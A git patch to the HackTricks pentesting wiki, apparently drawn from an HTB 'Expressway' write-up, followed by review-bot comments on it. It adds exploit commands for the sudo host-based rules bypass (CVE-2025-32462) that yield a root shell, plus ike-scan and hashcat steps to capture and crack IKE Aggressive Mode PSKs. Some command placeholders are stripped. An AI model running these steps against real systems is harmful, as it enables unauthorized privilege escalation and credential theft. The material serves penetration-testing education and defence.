From db55d29ba0fc6aee386c962b07dc3b85438c47c8 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Sat, 7 Mar 2026 18:36:54 +0000 Subject: [PATCH] Add content from: HTB: Expressway --- .../privilege-escalation/README.md | 26 +++++++++++++++++++ .../ipsec-ike-vpn-pentesting.md | 21 ++++++++++++++- 2 files changed, 46 insertions(+), 1 deletion(-) diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md index 7fd019a3c4c..bee3c0968b8 100644 --- a/src/linux-hardening/privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/README.md @@ -100,6 +100,31 @@ Here is a [PoC](https://github.com/pr0v3rbs/CVE-2025-32463_chwoot) to exploit th For more information, refer to the original [vulnerability advisory](https://www.stratascale.com/resource/cve-2025-32463-sudo-chroot-elevation-of-privilege/) +### Sudo host-based rules bypass (CVE-2025-32462) + +Sudo before 1.9.17p1 (reported affected range: **1.8.8–1.9.17**) can evaluate host-based sudoers rules using the **user-supplied hostname** from `sudo -h ` instead of the **real hostname**. If sudoers grants broader privileges on another host, you can **spoof** that host locally. + +Requirements: +- Vulnerable sudo version +- Host-specific sudoers rules (host is neither the current hostname nor `ALL`) + +Example sudoers pattern: + +``` +Host_Alias SERVERS = devbox, prodbox +Host_Alias PROD = prodbox +alice SERVERS, !PROD = NOPASSWD:ALL +``` + +Exploit by spoofing the allowed host: + +```bash +sudo -h devbox id +sudo -h devbox -i +``` + +If resolution of the spoofed name blocks, add it to `/etc/hosts` or use a hostname that already appears in logs/configs to avoid DNS lookups. + #### sudo < v1.8.28 From @sickrov 
@@ -2157,5 +2182,6 @@ vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md - [0xdf – HTB Previous (sudo terraform dev_overrides + TF_VAR symlink privesc)](https://0xdf.gitlab.io/2026/01/10/htb-previous.html) - [0xdf – HTB Slonik (pg_basebackup cron copy → SUID bash)](https://0xdf.gitlab.io/2026/02/12/htb-slonik.html) - [NVISO – You name it, VMware elevates it (CVE-2025-41244)](https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/) +- [0xdf – HTB: Expressway](https://0xdf.gitlab.io/2026/03/07/htb-expressway.html) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md b/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md index 250ea145dc9..0cbd3155c64 100644 --- a/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md +++ b/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md @@ -215,6 +215,24 @@ pip install 'pyopenssl==17.2.0' #It is old and need this version of the library ![](<../images/image (891).png>) +### Aggressive Mode identity leakage + +Aggressive Mode must send the **ID** early so the gateway can pick the right PSK when **multiple groups/users** exist. This means the **identity is exposed pre-auth**, unlike Main Mode where it is encrypted in later packets. You can extract it quickly: + +```bash +ike-scan -A +# Look for: ID(Type=ID_USER_FQDN, Value=ike@corp.tld) +``` + +If Aggressive Mode is enabled, capture a crackable PSK handshake and crack it offline (hashcat mode `5400`): + +```bash +ike-scan -A --pskcrack=handshake.txt +hashcat -m 5400 handshake.txt /path/to/wordlist.txt +``` + +Recovered PSKs are often **reused** as credentials for other services (SSH, VPN client auth), so test them against exposed services. + ## Capturing & cracking the hash Finally, If you have found a **valid transformation** and the **group name** and if the **aggressive mode is allowed**, then you can very easily grab the crackable hash: 
@@ -326,5 +344,6 @@ Practical tips ## References - [YIKES: WatchGuard Fireware OS IKEv2 out-of-bounds write (CVE-2025-9242)](https://labs.watchtowr.com/yikes-watchguard-fireware-os-ikev2-out-of-bounds-write-cve-2025-9242/) +- [0xdf – HTB: Expressway](https://0xdf.gitlab.io/2026/03/07/htb-expressway.html) -{{#include ../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../banners/hacktricks-training.md}}
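Review bot: In the README hunk at `@@ -100`, the inline command `sudo -h ` has lost its host argument (the placeholder was most likely swallowed as an HTML tag), so the sentence no longer says what the user supplies; write it as `sudo -h <hostname>` inside a code span so mdBook renders the brackets. Two more points in the same hunk: the closing paragraph suggests adding the spoofed name to `/etc/hosts`, which already requires root and so contradicts the unprivileged-user premise of the section; either drop that sentence or qualify it, and if name resolution really blocks the rule evaluation, say under which sudoers setting, since the text gives none. Finally, the fixed version (1.9.17p1) is only mentioned in passing; a short mitigation line would serve readers on the defensive side: upgrade to 1.9.17p1 or later and audit sudoers for host-specific rules (`Host_Alias` entries and host fields other than `ALL`), since those are exactly the rules the section says make a system exposed.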
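Review bot: The new reference entry in the `@@ -2157` hunk is the only one in that list without a parenthetical summary of the technique; for consistency with the neighbouring entries, append one, e.g. `- [0xdf – HTB: Expressway (sudo -h host-rule bypass, CVE-2025-32462)](...)`, so readers can tell which section it supports without following the link.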
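Review bot: In the ipsec hunk at `@@ -215`, both `ike-scan -A` invocations are missing their target argument (again a stripped placeholder, most likely), and the `--pskcrack` command carries no `--id`, although the very next, pre-existing section states that the group name is required before a crackable hash can be obtained; add the placeholders and either cross-reference or merge this block with the existing "Capturing & cracking the hash" section, which already documents the same `--pskcrack` plus hashcat mode 5400 workflow, so the page does not explain it twice. Since the new section explains why the identity is exposed pre-auth, it should also close with the corresponding mitigation: disabling Aggressive Mode (or moving to certificate-based authentication) removes that pre-authentication leak, and the "PSKs are often reused" remark is itself the argument for unique, high-entropy PSKs per peer.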
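Review bot: The `@@ -326` hunk restores the missing trailing newline on the include line, which is a welcome but unrelated cleanup worth a mention in the commit message; the new reference entry, however, lacks the descriptive title the existing entry in that list has, so add a short summary such as `(IKE Aggressive Mode ID leak and PSK cracking)` to match.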